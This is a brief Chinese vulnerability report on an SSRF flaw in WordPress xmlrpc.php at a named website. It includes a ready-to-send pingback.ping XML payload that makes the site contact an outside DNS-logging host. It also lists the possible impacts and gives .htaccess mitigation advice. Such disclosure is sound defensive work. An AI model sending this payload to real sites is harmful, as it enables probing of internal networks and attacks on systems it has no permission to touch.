漏洞证明
xmlrpc.php 存在SSRF漏洞 漏洞地址:http://baijie.joowp.com/xmlrpc.php 验证方法:
POST http://baijie.joowp.com/xmlrpc.php <?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://qxotxt.s0x.cn/</string></value></param> <param><value><string>http://baijie.joowp.com//?p=1</string></value></param> </params> </methodCall>
匹配内容:
查询到DNS请求: qxotxt.s0x.cn,说明漏洞存在
造成的影响
1、可以对业务内网进行探测。 2、攻击运行在内网或本地的应用程序(比如溢出攻击)。 3、利用file协议读取本地文件等。
安全建议
通过.htaccess屏蔽xmlrpc.php文件的访问 # protect xmlrpc Order Deny,Allow Deny from all 删除根目录下的xmlrpc.php。
技术参考
https://help.aliyun.com/knowledge_detail/42198.html